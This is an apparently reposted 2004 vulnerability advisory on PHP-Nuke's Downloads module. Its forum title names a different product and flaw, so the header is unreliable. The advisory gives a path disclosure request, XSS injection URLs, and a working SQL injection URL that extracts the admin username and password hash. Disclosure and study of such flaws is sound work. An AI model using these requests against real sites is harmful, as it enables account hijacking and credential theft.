pBB 2.0.8a and lower - IP spoofing vulnerability

[Ikarosavenger_79]

{================================================= ===============================}

{ [waraxe-2004-SA#027] }

{================================================= ===============================}

{ }

{ [ Once again - critical vulnerabilities in PhpNuke 6.x - 7.2 ] }

{ }

{================================================= ===============================}



Author Janek Vind "waraxe"

Date 05. May 2004

Location Estonia, Tartu

Web //waraxe.us/index.php?modname=sa&id=27





Affected software description

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~



Php-Nuke is a popular freeware content management system, written in php by

Francisco Burzi. This CMS (Content Management System) is used on many thousands

websites, because it's freeware, easy to install and has broad set of features.



Homepage //phpnuke.org





Vulnerabilities

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~



A. Full path disclosure



A1 - unsanitaized user submitted variable "show" can triger standard php error messages,

revealing full path to script - information, needed for potential hacker.



Example make request like this



//localhost/nuke72/modules.php?name=Downloads&d_op=viewdownload&a mp;cid=2&show=foobar



and error message appears



Warning Division by zero in D\apache_oot\nuke72\modules\Downloads\index.php on line 797





B. Cross-site scripting aka XSS



XSS can be used for cookie stealing, and because in PhpNuke authentication-related information

is stored in cookies, account's hijacking and ID spoof can happen.



B1 - XSS through unsanitaized user submitted variable "ttitle"



//localhost/nuke72/modules.php?name=Downloads&d_op=ratedownload&a mp;lid=0&ttitle=[xss code here]

//localhost/nuke72/modules.php?name=Downloads&d_op=ratedownload&a mp;lid=0&ttitle=<body onload=document.title=1337>





B2 - XSS through unsanitaized user submitted variable "sid"



//localhost/nuke72/modules.php?name=Downloads&d_op=viewsdownload& amp;sid=[xss code here]





C. Sql injection



C1 - noncritical sql injection through unsanitaized user submitted variable "orderby"



//localhost/nuke72/modules.php?name=Downloads&d_op=viewdownload&a mp;cid=2&orderby=foobar





C3 - critical sql injection through unsanitaized user submitted variable "sid"



Let's look at original code from "nuke72/modules/Downloads/index.php" line 901





$result=$db->sql_query("

SELECT lid, url, title, description, date, hits, downloadratingsummary, totalvotes,

totaments, filesize, version, homepage

FROM ".$prefix."_downloads_downloads

WHERE sid=$sid

order by $orderby

limit $min,$perpage

");



Oops, "$sid" variable is unquoted in sql query. Scary...

What, if we request something like



//localhost/nuke72/modules.php?name=Downloads&d_op=viewsdownload& amp;sid=-1/**/UNION/**/SELECT/**/0,0,aid,pwd,0,0,0,0,0,0,0,0/**/FROM/**/nuke_authors/**/WHERE/**/radminsuper=1/**/LIMIT/**/1/*



Cool - admin's username and password's md5 hash in plaintext



Have a nice day!







Greetings

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~



Greets to Raido Kerna and to all bugtraq readers in Estonia! Tervitused!

Special greets to //gamecheaters.us staff!_________________Faq - Contratti - Video Tutorial